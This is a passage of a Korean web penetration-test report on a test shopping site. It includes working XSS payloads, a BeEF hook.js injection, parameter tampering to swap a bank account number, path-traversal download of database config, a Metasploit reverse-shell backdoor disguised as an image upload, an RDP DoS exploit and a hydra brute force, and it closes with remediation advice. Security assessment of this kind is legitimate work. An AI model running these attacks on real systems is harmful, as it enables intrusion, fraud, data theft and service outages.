37 (2) URL 파라미터스크립트필터링여부 (GET 메소드 ) - Reflected XSS GET 메소드에대한점검인 Reflected XSS 에대한점검이진행됩니다. 웹페이지의모든 파라미터를대상으로점검하게되는데각파라미터에 Test 용문자열을입력하여응답에따라 취약점내포여부를판단하게됩니다. [ 그림 3-25] Reflected XSS 취약점점검순서 취약점점검용문자열은 XsshYd3 으로통일하며점검순서는 [ 그림 3-25] 과같이 Main 부터시작하여아래로내려오며진행하고자합니다. [ 그림 3-26] main 페이지파라미터확인 36 페이지

38 [ 그림 3-26] 을통해검색문자열이해당 main 검색폼의소스코드내에들어가있는것을확인할 수있는데파라미터명의경우프록시툴인 Burp Suite 를통해손쉽게확인이가능합니다. 그후검색폼에해당파라미터의취약점확인을위해 XsshYd3 <script>alert( Xss );</script> 문자열을입력합니다. 그결과예상했던반응이없었으며현재검색폼의 frmsearchword 파라미터는취약점에 노출되지않았습니다. [ 그림 3-27] Shopping Cart 페이지에대한 Reflected XSS 취약점점검 [ 그림 3-26] 과같은방식으로진행하다보면 Shopping Cart 의 URL 은물론이고소스코드에서도 Top 파라미터가그대로노출되는것을확인할수있습니다. 본점검에서이 URL 에확인용스크립트를삽입하여취약성을확인합니다. 37 페이지

39 [ 그림 3-28] Top 파라미터에대한취약점점검결과 Top=1"><script>alert('Xss');</script><!-- [ 그림 3-28] 와같이테스트용으로 Xss 메시지박스를출력하는스크립트를입력하자스크립트가 실행됩니다. 현재 Top 파라미터는 Reflected XSS 취약점에노출되었습니다 38 페이지

40 페이지 매개변수 페이지 매개변수 메인 searchmode user_id frmsearchword Password from PasswordAgain 로그인 gourl passwd_q user_id passwd_a passwd FullName 검색 radio RegNo searchquery RegNo2 num BirthDateYear ref BirthDateMonth r_step BirthDateDay reforder SolarLunarStatus 회원가입 name ismarry Address 글쓰기 home AddressHidden title Phone coding Phone2 content Phone3 file_up wheretel1 filename HandPhone tank HandPhone2 pwd HandPhone3 cart_amt Profession pay_amt_int Main pay_amt 공지 n_open receive_name 계산 cart_sno0 receive_addr1 top 결제 receive_tel 메뉴바 step paymethod tail cardno searchmode effect_year 음악검색 radio effect_month searchquery quota G_code 상품 bankcode ea 39 페이지

41 paidman cardno2 bankcode2 결제 effect_year2 paidman2 effect_month2 bank_amt2 장바구니 Top [ 표 3-10] Reflected XSS 취약점점검파라미터목록 [ 표 3.5.2] 는 Reflected XSS 에대한취약점을점검한파라미터들로실제취약점에노출된파라미 터는장바구니에서사용하는 top 파라미터임을확인하였습니다 모의침투 [ 그림 3-29] XSS 모의침투시나리오 모의침투는 BeEF 를활용하며 Oyes mall Q&A 게시판에악의적인스크립트가삽입된게시물을 게시합니다. 그리고이게시물에접근하는희생자는본인도모르는사이에 PC 의제어권을 공격자가미리구성해놓은 BeEF 서버에게제공합니다. 그결과정보수집, 좀비등의악의적인 행위를가능하게합니다. 이때 BeEF 란 Browser Exploit Framework 의약어로사용자가웹브라우져로웹페이지를읽을때 자바스크립트의형태로동작하여사용자의정보를수집하거나공격을가능하게하는도구를 말합니다. 40 페이지

42 [ 그림 3-30] BeEF 실행 #./usr/share/beef-xss/beef 명령어를통해 BeEF 를실행하면 [ 그림 3-30] 과같으며구동되는과정중에는접근가능한 BeEF 의경로가확인됩니다 :3000 혹은 IP : :3000 으로접근이가능하고사용할자바스크립트의 이름은 hook.js 라는스크립트파일입니다. [ 그림 3-31] BeEF Server 접속 [ 그림 3-31] 는설정을위한관리자페이지로의접근을위한로그인페이지입니다. 41 페이지

43 계정은 BeEF 에서기본적으로제공해주는 [ ID : beef, password : beef ] 계정을통해접속이 가능하며이로그인페이지에서사용자인증이성공하면 [ 그림 3-32] 과같은메인페이지가 화면에출력됩니다. [ 그림 3-32] BeEF 메인페이지 이페이지의인터페이스는 BeEF 로유도된사용자에게사용할수있는공격모듈을보여주는 Attack Module List 와공격등의결과를보여주는 Result 로구성됩니다. [ 그림 3-33] 악의적스크립트를내포한게시물작성 <script src = 42 페이지

44 [ 그림 3-33] 와같이게시물에접근하는순간 :3000, 즉 BeEF Server 에존재하는 hook.js 라는파일을실행시키는스크립트를내포한게시물을작성하였습니다. 이제만약이게시물에접근하는사용자가있다면접근과동시해 [ 그림 3-33] 에등록한스크립트가실행됩니다. [ 그림 3-34] 일반사용자의게시물접근및열람 [ 그림 3-34] 와같이일반사용자가게시물에접근하게되면공격자가내포시킨스크립트가 강제로실행되어희생자의정보는 BeEF 로전송됩니다. [ 그림 3-35] BeEF Server 에서의희생자제어권확인 [ 그림 3-35] 과같이게시물에접근한희생자의제어권이넘어온것을확인할수있으며 BeEF 에 포함된기능을통해다양한공격을수행할수있게됩니다. 43 페이지

45 이와같은방식으로 XSS 공격의경우악성코드다운로드에대한스크립트를실행하여좀비를 수집하는등여러가지공격이가능하게됩니다 대응방안 3.6. 파라미터조작 (BP-006 ~ 007) 취약점개념설명 파라미터란웹페이지상에서값을전달할때사용하는매개변수로이파라미터를변조시켜서 사용자의비정상적인동작을유도할수있습니다 취약점점검 서비스위치 [HOME] > [ 게시판통합 ] > [Q & A 게시판 ] 서비스 URL 파라미터정보 - [ 표 3-11] 파라미터조작점검위치 파라미터조작에대한점검을위해 Oyes mall Q&A 게시판에게시물을게시하고분석을 시도하겠습니다. 44 페이지

46 [ 그림 3-36] Oyes mall Q&A 게시판게시물의파라미터확인 점검을위해 Test 를위한게시물을작성하고프록시툴인 Burp Suite 를통해패킷을중간에서 가로채어파라미터들을확인합니다. 그결과게시물에대한모든정보와함께비밀번호까지 평문으로전송되는것이확인되었습니다. 이를악용하여해당파라미터들을변조하게되면게시물을원하는대로변경이가능하게됩니다 모의침투 모의침투에서는 45 페이지

47 [ 그림 3-36] 를통해확인한파라미터중게시물번호를의미하는 num 파라미터를변조하여 관리자가게시한게시물을수정하고이를통해사용자의금전적피해를유도합니다. [ 그림 3-37] 파라미터변조를위한관리자게시물확인 관리자가게시한계좌수정공지의파라미터를확인합니다. 본침투에서활용할파라미터는 게시물번호인 num 이기때문에이를확인하면 27 번이라는것이확인됩니다. [ 그림 3-38] 게시물수정 46 페이지

48 공격자는새로운게시물을한개생성한후 Edit 을눌러생성한게시물을관리자의계좌변경 공지와동일하게작성합니다. 작성의내용은계좌번호만공격자의계좌번호인 로 변경합니다. [ 그림 3-39] num 파라미터변조 게시물수정을위해프록시툴인 Burp Suite 를통해패킷을가로챕니다. 그리고 [ 그림 3-39] 과같이 num 파라미터를기존에확인한관리자계좌수정공지의게시물번호인 27 로변경한후전달합니다. [ 그림 3-40] 파라미터변조결과 47 페이지

49 그결과, 게시물의계좌번호가 에서 로관리자의계좌번호에서공격자가 설정한계좌번호로변경된것이확인됩니다. 이를통해일반사용자는결재시 로결재하여금전적피해를입게됩니다 대응방안 3.7. 에러메시지처리 (BP-012) 취약점개념설명 에러메시지는사용자가웹서버에잘못된접근을하거나서버측의관리미흡으로인한오작동에대한안내를해주기위한페이지입니다. 하지만이페이지자체에는의도하지않았으나해당서버에대한정보가노출되는경우가있습니다. 공격자는이를악용하여고의적으로에러메시지를발생시키고서버에대한정보수집을하게됩니다. 클라이언트에러 (4XX) 서버에러 (5XX) 에러코드 설명 에러코드 설명 400 클라이언트의잘못된요청 500 내부오류 401 클라이언트인증실패 501 서버수행불가서비스 402 예약됨 502 서버과부하 403 접근거부 503 서비스다운 404 페이지없음 [ 표 3-12] 웹페이지에러코드 [ 표 3-12] 는웹페이지내에서발생하는에러코드를의미하며위의코드들을기반으로해당웹 페이지에대한서버정보등을확인합니다 취약점점검 48 페이지

50 [ 그림 3-41] 에러페이지확인 [ 그림 3-41] 는 Oyes mall 의검색창에싱글쿼터 ( ) 를입력하여에러페이지를유도하였는데이를 통해해당웹페이지의서버, 사용언어등을파악할수있습니다 대응방안 3.8. 페이지내중요정보노출 (BP-16 ~ BP19) 취약점개념설명 페이지내중요정보노출취약점은서버측의정보취급미흡으로인해발생합니다. 예를들어 특정페이지내에서고객이나서버의중요정보들이별다른암호화나은닉없이그대로노출되어 있는취약점역시이에속합니다 취약점점검 (1) 중요개인정보노출여부점검 서비스위치 [HOME] > [ACCOUNT] 서비스 URL 파라미터정보 - [ 표 3-13] 개인정보노출취약점점검위치 중요개인정보노출여부점검이란페이지내에서고객의개인정보가노출되는것을말합니다. 49 페이지

51 [ 그림 3-42] 계정페이지주민등록번호노출 사용자계정의정보를확인하는페이지를확인해보면 [ 그림 3-42] 과같이주민등록번호가노출되어있는것이확인됩니다. 또한 [ 그림 3-42] 에서는비밀번호가 을통해보이지않지만이역시도웹브라우저에서제공되는 개발자도구를활용하면확인됩니다. 50 페이지

52 [ 그림 3-43] 개발자도구를통한비밀번호확인 개발자도구 (F12) 를실행하여 password 파라미터에대해검색을해보면 [ 그림 3-43] 와같이 asdfg 라는비밀번호역시확인됩니다. (2) 데이터베이스관련정보유출여부점검 데이터베이스관련정보유출여부란데이터베이스에서주요정보에대한보안정책이제대로 이루어지지않아 SQL Injection 공격등을통해접근하여데이터를얻어낼수있는취약점을 말합니다. 본취약점의경우 BP-27 의 Blind SQL Injection 을통한모의침투에서확인하였습니다 대응방안 51 페이지

53 3.9. 파일다운로드 (BP-023) 취약점개념설명 게시판등에저장된자료에대해위치지정에대한제한을부여하지않아웹서버내의비공개 자료를다운로드받을수있는취약점입니다. 일반적으로첨부파일을사용자에게제공하는 방식은 2 가지가존재합니다. 우선 URL 파라미터에파일이름혹은파일번호를할당하여 데이터를처리하는동적방식, 그리고다음으로특정디렉터리에파일링크를걸어사용자에게 제공하는정적방식이있습니다. 아래예시에서정적경로를보면변조할수없는구조로되어 있으며, 동적경로는약간의파라미터수정을통해시스템파일에접근이가능합니다. 동적경로 정적경로 공지사항 3.hwp&path=download 공지사항 1.hwp [ 표 3-14] 동적경로와정적경로의예시 파일의실제저장위치가노출되면공격자는서버의중요파일이저장되어있는디렉토리를 유추하여악의적인공격을수행합니다 취약점점검및모의침투 [ 그림 3-44] 파일다운로드취약점모의침투시나리오 52 페이지

54 모의침투는공격자측에서서버내의파일다운로드취약점을활용하여파일의저장경로를 알아내고이를통해서버의 DB 관련주요파일을다운로드합니다. 서비스위치 [HOME] > [ 게시판통합 ] > [Q & A 게시판 ] 서비스 URL 파라미터정보 - [ 표 3-15] 파일다운로드취약점점검위치 Q&A 게시판에 test.jpg 파일을업로드하고게시물에접근하여 test.jpg 를다운받습니다. 그리고이에대한패킷을프록시도구인 Burp Suite 로가로채서 test.jpg 파일의저장경로를확인합니다 [ 그림 3-45] 다운로드경로확인 ] [ 그림 3-45] 을통해 test.jpg 파일은 upload_file 라는경로에존재함을확인합니다. 또한파일 명은 strfilename 라는파라미터를, 경로는 f_path 라는파라미터를통해전달받는것을역시 확인하고이파라미터를변조하여다른경로의서버파일을다운받게됩니다. 53 페이지

55 [ 그림 3-46] 다운경로변조를통한 shop_board_list.asp 다운로드 [ 그림 3-46] 은 [ 그림 3-45] 에서 Burp Suite 를통해가로챈패킷의다운로드파일을./ 경로의 shop_board_list.asp 파일로조작하여다운로드를받는과정입니다. 이 shop_board_list.asp 파일내에서는중요한정보는없었느나 dbconn.asp 라는데이터설정파일의경로가./admin 이라는것을확인할수있었습니다. 54 페이지

56 [ 그림 3-47] dbconn.asp 파일다운로드 [ 그림 3-47] 과같이경로를다시한번변경하여데이터베이스와관련된데이터파일을다운받을 수있다 대응방안 55 페이지

57 3.10. 파일업로드 (BP-024) 취약점개념설명파일업로드취약점이란파일을첨부하여게시물을작성할수있는게시판에서일반적인파일 (txt, jpeg 등 ) 이아닌악의적인스크립트가내포된파일 (jsp, php, asp 등 ) 을첨부하여게시합니다. 그리고공격자가이악성스크립트를활용하여쉘을획득하는등의악의적인행위를가능하게하는취약점을말합니다 취약점점검및모의침투 [ 그림 3-48] 파일업로드취약점모의침투시나리오 [ 그림 3-48] 은파일업로드취약점에대한시나리오로 Metasploit 을통해백도어를제작하여 Oyes mall Q&A 게시판에백도어를게시합니다. 그리고이를다운받는사용자들에게백도어를 유포하여피해를유도합니다. 서비스위치 [HOME] > [ 게시판통합 ] > [Q & A 게시판 ] 서비스 URL 파라미터정보 - [ 표 3-16] 파일업로드취약점점검위치 본침투에서사용할백도어는 Reverse Connection 개념을활용한백도어입니다. 일반적인공격의경우에공격자가희생자에게공격을할때희생자측에방화벽이존재한다면공격에많은제약사항이따르게됩니다. 하지만이 Reverse Connection 의경우역으로공격자에게희생자가서버에접속하듯이 접속 하여굳이공격자가방화벽을우회하지않고도공격하게됩니다. 56 페이지

58 [ 그림 3-49] 백도어제작을위한 msf 구동 # msfconsole 직접백도어를구현하는방법도있겠지만본침투에서는 Metasploit 의기능을활용하여 Reverse Connection 의기능을포함한백도어를제작합니다. [ 그림 3-50] 사용할 payload 검색 # search reverse_tcp 사용하고자하는 payload 를검색하는데 meterpreter 의기능을활용하기위해 meterpreter 내에 있는 reverse_tcp 의경로를확인합니다. [ 그림 3-51] 백도어 mtom_size 생성 57 페이지

59 # msfpayload windows/meterpreter/reverse_tcp lhost= lport=666 X > ~/mtom_size.exe [ 그림 3-51] 는 mtom_size.exe 라는백도어를제작합니다. 이때 windows/meterpreter/reverse_tcp 라는모듈을활용하여백도어를생성하는데 Reverse connection 될서버, 즉공격자의 IP 는 을, 포트번호는 666 으로설정하여생성하게됩니다. [ 그림 3-52] 백도어게시 Oyes mall 의경우 *.exe 확장자의파일은업로드가불가능하기때문에우선확장자를 jpg 로 변경후게시하였습니다. [ 그림 3-53] Burp Suite 를활용한확장자변경 하지만실제로일반사용자가실행하기위해서는 *.exe 파일로변경해야합니다. 이때문에 58 페이지

60 [ 그림 3-52] 이게시될때의패킷을프록시툴인 Burp Suite 를활용하여가로채고 [ 그림 3-53] 와같이 mtom_size.exe 로수정합니다. [ 그림 3-54] 백도어서비스오픈후대기 # msfcli multi/handler payload=windows/meterpreter/reverse_tcp lhost= lport=666 E 이제게시물을올렸으므로공격자측에서는제작한백도어와같은환경설정 (IP, port, payload) 으로서비스를오픈하고기다립니다. 59 페이지

61 [ 그림 3-55] 희생자측백도어실행 희생자측에서백도어를실행하면 [ 그림 3-55] 과같이본인의무작위포트를통해공격자의 666 번포트로접속하게됩니다. 또한 예상시나리오대로방화벽이있다해도별다른메시지없이접속됩니다. [ 그림 3-56] 희생자로부터의공격자서버접근 공격자측에서는희생자가백도어를실행하여공격자서버에접근하였으므로 1 개세션이 맺어집니다.. 60 페이지

62 [ 그림 3-57] 검색옵션확인 meterpreter 에서의검색명령어는 search 인데이에대한옵션을확인하기위해 -h, 즉 help 옵션을입력합니다. -d : 검색하고자하는범위설정 -f : 파일검색패턴 -r : 하위디렉토리까지반복하여검색 [ 그림 3-58] dbconn.asp 경로확인 meterpreter > search -f db*.asp -d c:\ 보통 ms-sql 의경우복구를위해실제데이터는 *.mdf 에작업, 즉트랜젝션의경우 *.ldf 파일에저장하는데이를검색에활용하면찾을수있습니다. 하지만현재 Web Server 가구동되고있기때문에 Access 가되지않습니다. 때문에 Database 에접근할수있는정보를담고있는 asp 파일을검색하면 [ 그림 3-58] 와같이경로를확인할수있습니다. [ 그림 3-59] dbconn.asp 다운로드 61 페이지

63 해당경로로이동한후 download 명령어를활용하면 [ 그림 3-59] 과같이다운로드가가능합니다. [ 그림 3-60] dbconn.asp 내용확인 Meterpreter 를종료하고 dbconn.asp 의내용을확인하면 [ 그림 3-60] 과같습니다. 이와같이파일업로드취약점에노출되어있다면 희생자의 PC 에자유롭게접근하여파일을조작하는등의행위가가능합니다 대응방안 불필요파일존재 (BP-20 ~ BP22) 취약점개념설명 62 페이지

64 웹사이트에는페이지테스트를위한테스트 / 데모페이지파일또는운영상의편의를위해 주기적으로어플리케이션의구성요소를백업한파일등을보관합니다. 하지만이러한파일들을 웹사이트의디렉토리내에그대로보관하게된다면소스코드노출등의취약점이발생합니다 취약점점검 일반적으로특정파일에대한백업파일은해당디렉토리이름의압축파일로많이사용하는데 이를활용하여백업파일을찾습니다. 서비스위치 [HOME] 서비스 URL 파라미터정보 - [ 표 3-17] 불필요파일존재여부점검위치 [ 그림 3-61] 압축파일검색을통한백업파일다운로드 [ 그림 3-61] 는 라는 URL 을통해서버의 demoshop/shop/ 내에있는 shop.zip 이라는 shop 디렉토리의백업파일을다운로드합니다. 이는백업파일이웹서버의디렉토리내부에존재하며별도의대책을마련해두지않았음을의미합니다. 63 페이지

65 대응방안 최신취약점미패치 (BP-28) 취약점개념설명 64 페이지

66 최신취약점미패치에대한점검은운영체제나어플리케이션을이용하며취약점을주기적으로패 치하지않았을때의발생되는취약점에대한점검입니다 취약점점검및모의침투 [ 그림 3-62] 최신취약점미패치점검시나리오 취약점점검은은공개된취약점탐색도구인 Nessus 를활용하여점검하고 Nessus 에서발견된 미패치취약점을활용하여모의침투가이루어집니다. [ 그림 3-63] Nessus 스캐닝결과 [ 그림 3-63] 는취약점스캔의결과로 Nessus 는보안사고를일으킬수있는심각성에따라 4 단계로분류됩니다. 그리고이러한분류는위험도순서로 high > medium > low > info 로분류되는데본취약점점검에서는가장심각한취약점인 high 등급을받은 MS 취약점을활용하여모의침투를시도하였습니다. 65 페이지

67 [ 그림 3-64] metasploit 내의 ms 취약점공격도구검색 # search ms [ 그림 3-64] 는모의침투에활용하기위한 metasploit 내부의 ms 취약점에대한공격 도구를검색하는명령어입니다. [ 그림 3-65] ms 취약점공격타겟설정 # use auxiliary/dos/windows/rdp/ms12_020_maxchannelids # set rhost [ 그림 3-65] 은 auxiliary/dos/windows/rdp/ms12_020_maxchannelids 라는공격도구를선택하고 타겟으로 이라는 Oyes mall 의서버를대상으로설정합니다. [ 그림 3-66] ms 취약점공격타겟설정확인 66 페이지

68 [ 그림 3-66] 은타겟에대해정확하게설정이되었는지확인하는것으로현재공격대상은 :3389 로정확하게설정되었습니다. [ 그림 3-67] ms 취약점에대한 exploit # exploit [ 그림 3-67] 은기존에설정대로공격을수행하는것으로 exploit 명령어를통해공격이 수행됩니다. [ 그림 3-68] ms 취약점공격결과 공격실행후희생자의상태를보면서버가다운되며블루스크린이출력됩니다. 그리고이 과정에서 67 페이지

69 [ 그림 3-68] 와같이시스템종료이벤트추적기등이작업을수행하며부팅과정대기상태가유지될수있습니다. 이때는사용자가수동으로확인명령어를입력해야정상부팅시진행되며만약실시간으로제공되는서비스의서버가이러한공격을당하게되면서비스가중단되어예기치못한피해를입게됩니다 대응방안 불필요파일존재 (BP-014 ~ BP015) 취약점개념설명 관리자페이지란관리자가해당웹서버의사용자혹은데이터를쉽게관리하기위한기능과권한을갖고있는페이지를의미합니다. 그리고이페이지는일반사용자가인증을통과못하는것은물론관리자페이지에접근자체가불가능하도록서버가구성되어야합니다. 하지만설계상의오류혹은 URL 을통한추측등을통해관리자페이지가노출되는경우가생기는데이경우단순홈페이지변조뿐아니라웹서버자체의권한까지노출될위험이있는취약점입니다 취약점점검 서비스위치 서비스 URL 파라미터정보 [HOME] >[RedZone] [ 표 3-18] 관리자페이지추측가능여부점검위치 68 페이지

70 [ 그림 3-69] 개발자도구를활용한관리자페이지링크여부확인../admin/admin_top.asp [ 그림 3-69] 과같이 Oyes mall 에서개발자도구 (F12) 를통해 admin 문자열을검색해보면 손쉽게관리자페이지로추정되는페이지를확인할수있습니다. 69 페이지

71 [ 그림 3-70] 홈페이지내관리자페이지링크확인 또한해당소스코드를분석해보면 Red Zone 을통해서관리자페이지로이동할수있습니다 모의침투 [ 그림 3-71] 관리자페이지추측을통한모의침투시나리오 모의침투에서는 Q&A 게시판에관리자가올린게시물을통해관리자계정을확인하고 Brute Force 도구를활용하여비밀번호를획득하고자합니다. [ 그림 3-72] 관리자게시물을통한관리자계정유추 70 페이지

72 [ 그림 3-72] 은관리자의게시물을열고개발자도구를통해소스코드내의관리자계정의이메일을확인하는것으로 이라는이메일계정이확인됩니다. 이를통해관리자의계정이 onesider 이라는것을추측할수있으며 Burte Force 도구를통해비밀번호를알아냅니다. [ 그림 3-73] Brute force hydra 를활용한관리자비밀번호탈취 hydra -l onesider -P /root/pass.txt -s 83 [ 그림 3-73] 와같이 Brute Force 도구인 hydra 를활용하여관라자의계정 / 비밀번호는 onesider/one2sider 임을알아내었으며이를활용하여관리자페이지로접근하게됩니다. 71 페이지

73 [ 그림 3-74] 관리자페이지로그인성공 대응방안 72 페이지

74 4. [ 대응방안 ] 4.1. SQL INJECTION 입력값필터링 사용자가값을입력하였을때 SQL Injection 을발생시키지않도록해야합니다. 이를위해서는 사용자입력시특수문자 (' " / \ ; : 공백 -- + 등 ) 가포함되었는지확인하고허용되지않은 문자열이나문자가포함되어있다면에러로처리합니다 에러메세지의은닉 쿼리에러가났을경우에에러에대한정보를보여주는것이아니라일반적인오류페이지가 나타나도록설정합니다 소스코드에대한대책 (1) 기본시나리오 입력값을통해 SQL 쿼리문을생성하는 CGI 는입력값에대해체크하고변경시키는로직을포함해야합니다. 입력받은변수와데이터베이스필드의데이터형을일치시켜야하며사용중인 SQL 구문을변경시킬수있는특수문자가있는지체크하는문장을포함해야합니다. 검색부분과마찬가지로클라이언트로부터생성된 SQL 구문을받는부분이있다면이를제거해야합니다. (2) ASP 입력값에대해특수문자를검사하고 replace 함수를활용하여특수문자를제거합니다. (3) PHP addslashes() 함수를활용하여사용자가입력하는값 ($_GET, $_POST) 에역슬레쉬를붙여서 반환하게되면쿼터, 더블쿼터, 역슬레쉬등의특수문자를일반문자로변환하여 SQL Injection 을 방지합니다. 73 페이지

75 4.2. 인증우회 많은집합으로이루어진값을이용및토큰암호화 공격자로하여금토큰을추측하는데오랜시간이걸리게하기위해많은집합으로토큰을 생성하고공격자에게쉽게노출되지않도록암호화하여저장합니다 HTTPS 통신활용 암호화된프로토콜인 HTTPS 를활용하여토큰을전송합니다 만료정책 쿠키정보를만료시간을짧게설정하고사용자가로그아웃하지않아도일정시간후에자동 로그아웃시킵니다. 74 페이지

76 4.3. 디렉토리리스팅취약점 Windows Server [ 그림 4-1] windows server 디렉토리리스팅취약점대응방안 [ 제어판 ] - [ 관리도구 ] - [ 인터넷서비스관리자 ] - [ 기본웹사이트등록정보 ] [ 그림 4-1] 과같이디렉터리검색에체크를해제합니다 Linux Server # httpd.conf <Directory /app/apache/htdocs > Options Indexes FollowSymLinks AllowOverride None Order allow, deny Allow from all </Directory> Options 에서 Indexes 옵션을제거합니다. 75 페이지

77 4.4. XSS(CSRF) 취약점 입력값검증 웹 / 어플리케이션의경우사용자가입력하는입력값에대한검증이필요하며그조건은다음과같습니다. (1) 데이터의길이제한 (2) 허용문자를제외한특수문자의필터링 4.5. 파라미터조작 삭제와수정을요청하는페이지에인증과정구성 게시물에대한삭제와수정을요청할때해당게시물을작성한계정이맞는지에대한인증하는 인증과정이필요합니다 게시글접근시권한확인 접근하는게시물에대해권한이있는지에대한검증과정이필요합니다. 예를들어다른 사용자가작성한비밀글의경우관리자와해당사용자외에는열람이불가능해야합니다 에러메시지처리 단순에러메시지출력 [ 그림 4-2] 단순에러메시지출력을위한설정변경 [ 설정 ] - [ 제어판 ] - [ 관리도구 ] - [ 인터넷서비스관리자 ] - [ 등록정보 ] - [ 사용자지정오류 ] 사용자지정오류옵션을통해에러메시지를아무런정보를갖지않는단순에러메시지를 출력하도록수정합니다. 76 페이지

78 4.7. 페이지내중요정보노출 사용자계정정보에중요정보노출금지 사용자계정정보페이지에서주민등록번호, 비밀번호등의중요정보를암호화를거치거나 HTML 을통해정보를취급하는것이아니라 PHP/JSP 등의언어를활용하여해당정보를특수 문자로가려서식별할수없도록페이지를구성합니다 파일다운로드 이취약점은직접적으로객체를참조하기때문에생기는문제입니다. 그리고이는직접참조방식을간접참조방식으로변경함으로써해결할수있습니다. 즉서버에게요청이들어올때파라미터에대한검증을거쳐다른경로로의이동에대한문자열을필터링해야합니다. 예를들어상위경로로의이동을가능케하는.// 등의문자열을제한하는방식이있습니다. [ 그림 4-3] 경로변경문자열에대한필터링조건삽입 [ 그림 4-3] 과같이. / 등과같이경로를변경할가능성있는문자에대해공백으로변경하는 Replace 함수를삽입하여문제를해결합니다. 77 페이지

79 4.9. 파일업로드 Windows Server [ 그림 4-4] Windows Server 파일실행권한제거 파일업로드취약점의경우 [ 그림 4-4] 와같이업로드된파일이서버상에서실행되지않도록실행권한을제거하는방식이 있습니다 불필요파일존재 백업파일및웹서버주요파일의저장위치확인 웹서버의백업파일이나주요 DB 파일등은웹서버의디렉토리가아닌공격자에의해 노출되지않는장소에별도저장및보관을해야합니다 최신취약점미패치 어플리케이션에대한최신업데이트 최신동향을파악하여어플리케이션에대한최신버전을유지해야합니다. 78 페이지

80 4.12. 관리자페이지추측 관리자페이지접근불가 일반사용자에게관리자페이지가노출되지않도록하며관리자페이지를추측이가능한쉬운 페이지명으로사용하지않아야합니다 ACL(Access Control List) 를활용한관리자페이지접근가능 IP 설정 [ 제어판 ] - [ 관리도구 ] - [ 인터넷서비스관리자 ] - [ 해당관리자페이지우클릭 ] - [ 디렉터리보안 ] - [IP 주소및도메인이름제한 ] [ 그림 3-75] 관리자페이지에대한 ACL 설정 [ 그림 3-75] 과같이 ACL 을작성할수있으며만약접근시켜야하는 IP 가있다면예외를통해 추가해주어야합니다. 79 페이지